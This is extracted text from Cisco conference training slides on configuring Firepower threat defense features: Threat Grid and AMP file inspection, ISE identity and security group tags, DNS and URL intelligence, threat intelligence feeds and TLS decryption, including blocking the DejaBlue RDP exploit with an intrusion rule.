Unified malware analysis and threat intelligence platform

• Automated Engine observes, • Producing human readable behavioral

deconstructs and indicators for each file submitted
• static analysis • Global scalability drives context rich
• File on disc information, can be consumed directly or
• header details via content rich threat intelligence feeds
• AV engines – “Wikipedia of Malware”
• dynamic analysis
• Execution/Detonation
• Network Connections
• File/System changes
• Function/Library calls

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 410
Threat Grid Supported File Types

• Wide range of supported file types: • Limitations:

(examples) • .TXT / .APK / .DOS are not supported
• Executables • Maximum file size: 100MB
• Java, Javascript • Files should not be empty
• PDF, SWF • ZIP archives may contain a maximum of 255
• Office files. Archives with more than 255 files will
return no analysis, and will display an error
• Archives (ZIP, XZ, GZ, BZ2,TAR)
stating that too many files were found
• Scripts (BAT, PS1, VBS, WSF)
• The maximum file size for each file within a Zip
• URLs archive is 100MB (unzipped)
• All files executed by Windows (.PE32 / • ZIP archive size cannot be greater than 600MB
.PE32+ Files) when unzipped
https://panacea.threatgrid.com/doc/main/release_notes.html

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 411
Workflows for Public Cloud
Step by step workflows taken during malware detection

1. SHAs are generated by AMP and queries FMC

Public Cloud
2. If FMC does not have a cached disposition, FMC
queries AMP Cloud for a reputation lookup AMP 5 Threat Grid

3. Reputation returned:
• If Clean – File Download Completed
• If Malicious – File Download Dropped 2 3 6 4
• If Unknown – File Copied for preclassification (ClamAV) and
Download completes
1
4. If supported, File is sent to Threat Grid for Analysis FMC 3 FTD
6
5. Threat Score passed to AMP Cloud (Poke) NOTE: In deployment scenarios where the
devices communicate with the TG cloud, the
6. AMP Cloud generates a disposition and sends this to FMC UUID is used to know which FMC should
the AMP Connector (PING2) via FMC receive the return data
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 412
File Policies
Part of the overall Access Control configuration

• A set of configurations that the system

uses to perform AMP for Networks and network traffic

file control, as part of overall access

control configuration Rule 1: Allow
matching
File Policy A
traffic
• This association ensures that before the no match
matching
system passes a file in traffic that Rule 2: Allow File Policy B
traffic
matches an access control rule’s no match
conditions, it first inspects the file
Default Action: IPS
Access Control Policy
• Associate a single file policy with an
access control rule whose action traffic allowed without file
is Allow, Interactive Block, or Interactive inspection

Block with reset

NOTE: Cannot use a file policy to inspect traffic

handled by the access control Default Action
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 416
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy

To improve performance, restrict file

detection to only one of those application
protocols on a per-file rule basis

NOTE: Frequently triggered file rules can

affect system performance. For example,
detecting multimedia files in HTTP traffic
(YouTube, for example, transmits
significant Flash content) could generate
an overwhelming number of events

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 418
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy

Use Any to detect files over multiple

application protocols, regardless of
whether users are sending or receiving

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 419
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy

NOTE: File rules are evaluated in rule-

action, not numerical order

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 420
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy

Snort process restarts: Snort process restarts:

Adding the first or removing the last file rule that Enabling or disabling Store files in a Detect
combines the Malware Cloud Lookup or Block Files or Block Files
Malware file rule action with an analysis option or a store
files option (Malware, Unknown, Clean, or Custom)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 421
File Policy Configuration If two or more rules match for the same file type:
1. Block Files
2. Block Malware
3. Malware Cloud Lookup
• Order does not matter 4. Detect Files

• Blocking takes precedence over malware inspection and blocking which takes
precedence over simple detection and logging

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 424
File Policy Association
Granular control to identify and block files transmitted on your network

Associated single file policy

with an access control rule

Default Action cannot be

associated with a file policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 425
File Policy Attached to Main Access Policy

root@gate1:/var/sf/detection_engines# cd 713c210c-7774-11e7-8d1c-c97d791ede62/
root@gate1:/var/sf/detection_engines/713c210c-7774-11e7-8d1c-c97d791ede62# cat ngfw.rules
#### ngfw.rules
--- snip ---
filepolicy 1 2526c8a2-3f52-11e8-b561-4c4afb51c75b
threatlevel 76
firstTimeAnalysis 1
malware log,block,reset http any neutral capture,sandbox
21:1,23:11,120:248,22:9,282:9,283:9,284:9,285:9,286:9,287:9,288:9,289:9,27:15
type log http any none none
--- snip ---
endpolicy
--- snip ---
# Start of AC rule.
--- snip ---
268448775 allow 2 any any 3 any any any any (log dcforward both) (ipspolicy 1) (filepolicy 1 enable) (appid
225:1, 3501:1, 676:1, 1696:5, 846:7, 4084:5)
# End rule 268448775
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
AMP for Endpoints
AMP for Endpoints vs. AMP for Networks
FMC works with data from AMP for Networks and AMP for Endpoints

• AMP for Endpoints malware detection • Managed devices detect malware in

is performed at the endpoint at network traffic
download or execution time
• Network traffic contain port,
• Malware events detected by AMP for application protocol, and originating IP
Endpoints contain information on file address information about the
path, invoking client application, … connection used to transmit the file

🔎
Internet
FMC

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 428
AMP for Networks vs. AMP for Endpoints
FMC works with data from AMP for Networks and AMP for Endpoints

• The system uses IP and MAC address

data to tag monitored hosts with
indications of compromise obtained
from your AMP for Endpoints
deployment
• Malware events generated by AMP for
Endpoints do not add hosts to the
network map
• Depending on the deployment,
endpoints monitored by AMP for
Endpoints may not be the same hosts
as those monitored by AMP for
Networks

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 429
Configuring an AMP for Endpoints Cloud
Connection
• AMP for Endpoints can import threat identifications,
indications of compromise (IOC), and other malware-related
information from the AMP cloud to the system

Choose cloud In high availability configurations,

private / public
configure AMP cloud
Proceed as described in:
http://cs.co/9009E359h
connections independently on
the Active and Standby
instances of the Firepower
Management Center; These
configurations are not
Check box appears synchronized
only in the Global
domain
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 433
Verify AMP for Endpoints Cloud Connection

Configure settings as
needed. Define group
membership and assign
policies
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
AMP for Endpoint Integration
Network File Trajectory with AMP for Endpoints Events

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 435
Identity and TrustSec
FTD Identity Information

User Control User Awareness

HR User can have access to Social Media Is 10.10.10.23 HR User or ENG User?

ENG User does NOT have access to Social Media 10.10.10.23 is HR User

FMC
Remote VPN
10.10.10.23 Access User-IP mapping

HR User Network Internet

Wireless

10.10.10.24 FTD Routers

Switch
ENG User

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 437
User awareness in Connection Events

• Connection Events – Initiator User

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 438
User Based Indication of Compromise (IoC)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 440
User Based Indication of Compromise (IoC)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 441
User Control

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 442
User Identity Sources

The Firepower System supports the following identity sources:

• Traffic-based detection User Discovery

• Identity Services Engine (ISE/ISE-PIC)

• Firepower User Agent Passive Authentication

• Cisco Terminal Services (TS) Agent

• Captive portal authentication

Active Authentication
• Remote Access VPN

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 443
For Your
Warning Message About Cisco Firepower Reference

User Agent EOL

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 444
Identity Services Engine (ISE)
Cisco Platform Exchange Grid (pxGrid)

Active
Directory

IP - User mapping
Device Type
Rapid Threat
Location IP
Containment
SGT

Cisco ISE FMC

Remote VPN
Access HR
Servers
Wireless Network

HR User Routers FTD DC Switch ENG

Switch Servers

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 445
For Your
Identity Services Engine (ISE) Reference

• Provides user awareness data for users who authenticate using Active Directory
(AD), LDAP, RADIUS, or RSA
• You can perform user control on Active Directory users
• Authoritative identity source
• Does not report the activity of ISE Guest Services users

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 446
ISE Passive Identity Connector (ISE-PIC)

• Input to ISE-PIC: WMI, ISE-PIC Agent, Kerberos SPAN, REST API, Syslog
• Output to FMC: pxGrid Publish/Subscribe

User-IP mapping

Windows Domain Logon

Active FMC
ISE-PIC
Switch Directory
HR
Servers
Non-802.1X Wireless Network

Routers FTD DC Switch ENG

Servers

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 447
ISE-PIC

• The Cisco ISE Passive Identity Connector is a subset of functionality offered with
Cisco Identity Service Engine
• Supports only passive ID functionality

• ISE-PIC does not provide ISE attribute data (SGT, Device Type, Location)

• ISE-PIC does not support ISE Rapid Threat Containment

• Supports up to 100 domains

• SXP is not supported by ISE-PIC

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 448
Access Control Identity Policy

Access Control > Identity

Configure the Identity Policy First

Add Rule

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 449
Access Control Identity Policy

Add Rule
Active or Passive Authentication

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 450
Access Control Identity Policy

Access Control > Access Control

Bind the Identity Policy to the Access
Control Policy

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 451
For Your
ISE Integration – AD Group Information Reference

• User and AD group information

• Authenticated users are supported for
enforcement scenarios

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 452
Cisco TrustSec overview
Segmenting with Security Group Tags (SGTs)
Active
Directory

SGT-IP mapping

Cisco ISE FMC

Remote VPN
Access HR
Servers
8 SGT

5 SGT Wireless Network

HR User Routers FTD DC Switch ENG 7 SGT

Switch Servers

Classification Propagation Enforcement

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 453
Security Group Tags (SGT) Classification

• Dynamic Classification
• MAB
• 802.1x
• WebAuth

• Static Classification
• L3 Interface (SVI)
• VLAN
• Subnet
• L2 port
• VM (Port Profile)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 456
SGT Dynamic Classification

• Authorization Policy ISE – Assign Security Groups based on Conditions

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 457
SGT Static Classification

• IP SGT Static Mappings are the easiest way to add mappings to ISE

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 458
Security Group Tags (SGT) Propagation

• Control Plane Propagation

• Out of band SGT
• IP-to-SGT data shared over control protocol between ISE and FMC
• Methods include, IP-to-SGT exchange over: SXP pxGrid

• Data Plane Propagation

• Inline SGT
• SGT carried inline in the data traffic
• Methods include, SGT over: Ethernet MACSec LISP/VxLAN

IPSec DMVPN GETVPN

DMAC SMAC 802.1AE Header 802.1Q CMD ETYPE PAYLOAD ICV CRC

CMD EtherType Version Length SGT Opt Type SGT Value Other CMD Options
16 bit (64K SGTs)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 459
SGT Propagation to FMC – pxGrid and SXP

Topics

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 461
Security Group Tags (SGT) Propagation

• All learned and locally defined SXP mappings in ISE

• SXP propagration to FMC is only via an ISE subscription

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 462
SGT Propagation - Inline Security Group Tags

• Can be used for Source SGT

• Inline SGTs seen in traffic take precedence SGT to IP mapping provided by ISE
• Untagged traffic is still matched to rule using IP to SGT mapping provided by ISE
• ISE integration is not needed – SGTs can be defined in FMC
• FTD does not add or remove tags from traffic

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 466
Inline Security Group Tags (SGT) Configuration

• Locally defined SGTs are Objects on the FMC

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 467
Security Group Tags (SGT) Enforcement

• Access Control Policy with Source and Destination SGT

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 468
Create Access Control Rules with SGT Criteria

• Select the SGT/ISE Attributes Tab

• Select “Security Group Tag” from Available Metadata
• Add an SGT to Source and/or Destination

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 470
For Your
ISE Integration – Security Group Tag Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 471
For Your
ISE Integration – Device Type Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 472
For Your
ISE Integration – Location IP Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 473
Security Group Tags (SGT)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 474
Demo:
Identity and SGT
Security
Intelligence
Security Intelligence

• TALOS dynamic feed, 3rd party feeds and lists

• Network Intelligence

• URL Intelligence

• DNS Intelligence

• Multiple Categories: Attacker, Bogon, Bots, CnC, Cryptomining, DGA, Exploitkit, Malware,
OpenProxy, OpenRelay, Phishing, Response, Spam, Suspicious, TorExitNode
• Multiple Actions: Allow, Monitor, Block, Interactive Block…

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 479
Security Intelligence Policy
Access Control Policy Configuration
IP addresses

URLs

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 480
Security Intelligence Feed Service

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 481
Security Intelligence Dashboard

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 482
DNS Security
Intelligence
DNS Protection

• Attackers are leveraging DNS !

• Blacklist domains associated with Bots,
CnC, Malware Delivery
• Fast-flux: High Frequency DNS Record
Changes
• Control C&C traffic and Botnets
• Restrict access to domains violating
corporate policy

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 484
DNS Inspection

• Security Intelligence extended to inspect DNS lookups

• Drop or monitor DNS connections to malicious sites

• Support all of the functionality in IP/URL based SI (i.e., custom lists/feeds/global

blacklists/whitelists)
• Blocking DNS connections should support the following additional actions
• Sinkhole
• NXDOMAIN

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 485
Configuring DNS Policy
Adds new DNS Policy

Create new DNS policies

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 486
DNS Policy

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 487
DNS Rule Configuration

Actions

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 488
Action: DNS Sinkhole

Sinkhole Server

Generate SI
Local Event & IOC
DNS Server
C&C over DNS C&C over DNS
10110110 Internet
10101111

Sinkhole IP Sinkhole IP
Connection to Sinkhole IP
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 489
Associate DNS Policy with an Access Control Policy

DNS Policy

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 490
Security Intelligence Events

Security Intelligence Category

Action: Sinkhole
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 491
Cisco Threat
Intelligence
Director (CTID)
Cisco Threat Intelligence Director (CTID)

• Problem: • Two Elements:

• “More intelligence sources become available • STIX (Structured Threat Intelligence
everyday, but products that are expected to eXpression) is a standard for sharing and
provide utility from that intelligence aren’t using threat intelligence information
evolving to operationalize it” • TAXII (Trusted Automated eXchange of
• Solution: CTID Indicator Information) is a transport
mechanism for threat information
• Uses 3rd party threat intelligence to identify
threats and automatically blocks supported
indicators on NGFW
• Provides a single integration point for all
STIX and CSV intelligence sources

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 493
How Does It Work?

Block Monitor

Cisco Threat
Intelligence Director
SI Lists
FMC

Step 1 Step 2 Step 3

Ingest third-party Cyber Publish observables to Detect and alert
Threat Intelligence (CTI) firewalls on incidents

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 494
Prerequisites
• FMC:
• 6.2.2 (or later) version (can be hosted on
physical or virtual FMCs)
• Minimum of 15 GB of memory (FMCv)
• REST API access enabled

• Advanced Settings tab of the Access

Control Policy option→ Enable Threat
Intelligence Director (default)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 495
CTID Status

• Service is running:

• Supported Devices with Access Control Policy

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 496
Configuration - Sources

Action configuration is per Indicators, not for STIX source group

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 497
Configuration - Indicators

Publish = download
to the FTD

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 498
Configuration - Observables

Set to Block or
Monitor per
observable

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 499
Incident Handling

• Incident Monitoring:

flexible filtering Delete incident

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 500
Usability
Improvements
Contextual Cross-Launch
Firepower Version 6.3

• Launch a query into a different product, from any relevant event or dashboard

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 502
Contextual Cross-Launch
Several tools included

Cisco tools included

Other integrations

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 503
Contextual Cross-Launch
Additional integration - Stealthwatch

• Add your own Contextual Cross-Launch : Analysis -> Advanced -> Contextual
Cross-Launch
• Example for Cisco Stealthwatch:

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 504
For Your
Contextual Cross-Launch Reference

Stealthwatch Cross-Launch Example

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 505
Contextual Cross-Launch
Additional integration - Tetration

• Add your own Contextual Cross-Launch : Analysis -> Advanced -> Contextual
Cross-Launch
• Example for Tetration:

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 506
For Your
Contextual Cross-Launch Reference

Tetration Cross-Launch Example

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 507
Hit Counts for Access Control and Prefilter Rules
Firepower Version 6.4

• Identification of active rules and non-active rules across the system

• Identification of the “freshness” of a rule,“stale” rules can confidently be cleaned up
• Rule data has the following information:
• Hit Count
• First Hit Time
• Last Hit Time

• Rule data is not cleared when a rule is modified

• Rule data is removed on deletion of the corresponding rule
• Rule data is preserved across Snort restarts, failover, and cluster role changes

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 508
Hit Counts for Access Control and Prefilter Rules
Firepower Version 6.4

Analyze Hit Counts

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 509
Hit Counts for Access Control and Prefilter Rules
Hit Count Dialog

Select a device Fetch Current Hit Count

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 510
Hit Counts for Access Control and Prefilter Rules
Search and Filter Rules

Search and Filter Rules

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 511
Hit Counts for Access Control and Prefilter Rules
Clear Hit Count

Clear Hit Count

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 512
Light Theme (Experimental)
Firepower version 6.5

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 513
Pagination for Access Control and NAT Policies
Firepower Version 6.5

Increased to 1000

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 514
Access Policy Filtering
Firepower Version 6.5

• FMC 6.5 adds string search/filter across all or specific ACP columns
Only show matching entries Search/Filter string

• Powerful tool for managing multi-tenant policies with Insert new rule…
• Future releases will add more flexible multi-column matching constructs and save
capabilities

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 515
Access Policy Filtering
Demo

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 516
Improved Object Management
Firepower Version 6.5

• Available for network and URL objects

• Shows were objects are used
• Network or URL groups
• ACLs
• Policies

• Recursive object finder from Object Usage screen

• Provides links to policies
Right click to View Objects… from any screen
• Will be extended in future releases

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 517
Object Usage
Demo

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 518
URL Filtering
URL Filtering
Overview

• FTD allows URL Category and Reputation filtering functionality

• URL database that contains URL category and reputation information is downloaded
daily by the FMC and distributed to managed devices
• Database lookups: Snort on devices loads the database and performs lookups in
real-time on HTTP/HTTPS streams based on configured
• Cloud lookups are performed for URLs that are not found in the database
• Pre-6.5 URL Filtering feature uses Webroot/BrightCloud as data source
• From 6.5 release data is provided by Talos

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 520
Talos URL Filtering
Firepower Version 6.5

• URL Categories change from previous vendor -> Talos

• 109 total categories with a gradual guided migration from previous 84 categories

• URL Reputation name changes

Talos Reputation Score Old Score Talos Reputation Old Reputation
—10 -> +10 0->100
score <= -5.9 10 Untrusted High risk

-5.9 < score <= -3.0 30 Questionable Suspicious sites

-3.0 < score <= 0.1 50 Neutral Benign sites with security risks

0.1 < score <= 6.0 70 Favorable Benign sites

score > 6.0 90 Trusted Well known

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 521
For Your
Talos URL Filtering Reference

Firepower Version 6.5

• These changes affect Policies:

• AC Policy -> Rule edit -> URLs
• SSL Policy -> Rule edit -> Category
• QoS Policy -> Rule Edit -> URLs

• Backend:
• New daemon (beakerd)
• New database format (uridb)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 522
URL Backend - Databases
Firepower Version 6.5

• Talos publishes both Legacy (pre-6.5) and Native (6.5+) databases

• Three URI DB sizes that are stored at /var/sf/cloud_download/cisco/
• Large(500MB), Medium(125MB), Small (33MB)

• FMC/FDM push a full update file every Sunday, partial updates daily
• Merging of part file into current full and making new full DB happens only on Firewall
• Every Sunday with new Full file for each Cisco DB, all previous files will be purged
• For all pre-6.5.0 devices Talos publish two different DBs
• legacy_20m (holds 20 million entries)
• legacy_1m (holds 1 million entries)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 523
Dispute URL categories and reputations
Analysis > Advanced > Lookup > URL

• New link for “Dispute URL categories and reputations” – links to Talos website

•
The button shows up only
when cursor hovers over a
•
particular entry

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 527
Dispute URL categories and reputations

• URL Filtering page under System > Integration > Cloud Services

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 528
Dispute URL categories and reputations

• New dispute option is also added when you right click on URL category and/or URL
reputation under connection events
•

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 529
Dispute URL categories and reputations
Cloud Services

Submit a Web Reputation Ticket

Submit a Web Categorization Ticket

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 530
Transport Layer
Security (TLS)
Decryption
The Importance of TLS/SSL

• Google, Facebook, Twitter encrypting

all traffic
• Google ranking influenced by using HTTPS

• Browser vendors aggressively pushing

HTTPS, because HTTP =
• Now, ~80 percent of all Firefox traffic
is HTTPS
• https://letsencrypt.org/stats/

• Problems with older TLS version

• leading to upgrade of servers to newer
protocols and ciphers, Poodle, Freak,
Beast, ….

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 532
TLS Decryption
IPS rules

• It works on any port, not just 443 and HTTPS: NGFW rules
• SMTPS, IMAPS, POP3S, FTPS…

• Supported versions: SSL 3.0, TLS 1.0, 1.1, 1.2

App ID
• SSLv2: based on the config, block or block with reset or do not decrypt detection
• No SSH, Spdy, Quic

• For TLS 1.3: Downgrade service Packet, TCP

stream
processing
• Certificate Revocation List, CRL is supported
• No additional SSL license is needed
Decrypt if
• Understand impact of TLS Decryption TLS

Data acquisition

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 533
Hardware Acceleration
Firepower platform 4100 and 9300 2100 1000

From version 6.2.3 6.3 6.4/6.5 (1150)

• Default: ON, however you could switch OFF until version 6.4
system support {ssl-hw-offload enable | ssl-hw-offload disable}
• Displays the current status of SSL hardware acceleration: (the default state is 6.2.3:
disabled, 6.3 and 6.4: enabled)
system support ssl-hw-status
• From 6.4:
• TLS crypto acceleration cannot be disabled
• Support for TLS crypto acceleration on one FTD container instance on a Firepower 4100/9300
module/security engine, acceleration is disabled for other container instances, but enabled for
native instances

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 534
For Your
Hardware Acceleration Reference

Performance Numbers
1010 1120 1140 1150

150 Mbps 700 Mbps 1 Gbps 1.4 Gbps

2110 2120 2130 2140

365 Mbps 475 Mbps 735 Mbps 1.4 Gbps

4110 4115 4120 4125 4140 4145 4150

4.5 Gbps 6.5 Gbps 7.1 Gbps 8 Gbps 7.3 Gbps 10 Gbps 7.5 Gbps

SM-24 SM-36 SM-40 SM-44 3xSM-44 SM-48 SM-56 3xSM-56

7.5 Gbps 8.5 Gbps 10 Gbps 10 Gbps 25 Gbps 11 Gbps 12 Gbps 28 Gbps

Throughput measured with 50% TLS 1.2 traffic with AES256-SHA with RSA 2048B key
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 535
TLS 1.2 Session Without TLS Decryption

Client Server
Client Hello “I choose to speak:
“I can speak TLS1.2
TLS1.2, AES256 and
or less, cipher list, Server Hello / Certificate and key exchange / this is my cert”
extensions”
Server Hello Done Subject and Subject
Server Name
Client Key Exchange / Change Cipher Spec / Alternate Names:
Indication (SNI)
Fields in the Certificate
extension: client Finished that identify the server
indicates which
hostname (FQDNs)
hostname it is
attempting to Change Cipher Spec /
connect Finished

app data (encrypted), for example, HTTP request

Cannot filter HTTP
request and content,
since it is encrypted

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 537
TLS 1.3

Client Server
• Approved on March 21, 2018 Client Hello, supported
cipher suites, key share
• Several security and acceleration
improvements
• Not safe, old ciphers were removed: SHA1, DES, Server Hello / chosen cipher
MD5, ... suite / key share
Certificate & signature, finished
• “One-trip” and even “zero-trip instead of “two-trip””
(remembers connection), faster connection
• Zero-trip: replay attack vulnerability
Finished HTTP GET
• Server certificate is also encrypted

• Browsers support (Chrome, Firefox,…)

HTTP Answer

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 538
TLS 1.3 Downgrade
Undecryptable Action is taken

• Default: “True”, Switch ON/OFF (after consulting with Cisco TAC):

system support ssl-client-hello-enabled aggressive-tls13_downgrade <false/true>

• You must restart snort before this change will take affect, this can be done via the
CLI command:
pmtool restartbytype DetectionEngine

• Show the status:

system support ssl-client-hello-display
extensions_remove=16,13172,43
tls13_downgrade=true

• More information on FTD 6.3 and earlier versions:

https://www.cisco.com/c/en/us/td/docs/security/firepower/SA/SW_Advisory_CSCvh22181.html

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 539
Client Hello and TLS 1.3

• Workaround: remove version 43, TLS 1.3, manually

system support ssl-client-hello-tuning extensions_remove 43

Client Hello

0x0304 (dec 43) -> TLS 1.3

• Each rule can specify how to process the matching TLS traffic:
• Decrypt using known certificate and key (for traffic destined to internal server)
• Decrypt using certificate re-sign (for outgoing traffic)
• Do-not-decrypt and Block/Block with Reset

• DHE and ECDHE cannot be supported since traffic must be modified, industry
protocol limitation
• “Trusted CA” should be listed in the TLS Decryption policy
• Add the known key and certificate to here: Object > Object management > PKI >
Internal Certs

FTD with copy of Server key

and certificate
ABC
ABC
ABC #$* #$*

Client NGFW Server

Action: Decrypt One of the

with Known Key known keys

• Intrusion Event:

• Connection Event:

No DHE nor ECDHE

Action: Block

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 547
Use Case: Defend Against Encrypted DejaBlue
https://blog.talosintelligence.com/2019/09/the-latest-on-bluekeep-and-
dejablue.html
• BlueKeep, DejaBlue against CVE-2019-0708 RDP
Server
• Add RDP Server’s Certificate to FMC > Objects > Internal Cert
• Configure decryption rule

© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Use Case: Defend Against Encrypted DejaBlue
(Cont.)
• Filter for Snort ID 51369: "OS-WINDOWS Microsoft Windows RDP
DecompressUnchopper integer overflow attempt.”
• Click the checkbox and select Rule State -> Drop and Generate Events

Dropped packets

• It cannot inspect outgoing traffic in passive mode since it requires modifying (re-
signing) the server cert

FTD with CA generated

key/certificate used to resign ABC
modified server certificate

ABC
ABC #$* >!?

Modified server cert Original server cert

Client Server

1. Create a certificate signing request

on FMC (Objects->PKI-> Internal
CAs, Generate CA, Generate CSR)
2. Issue the certificate
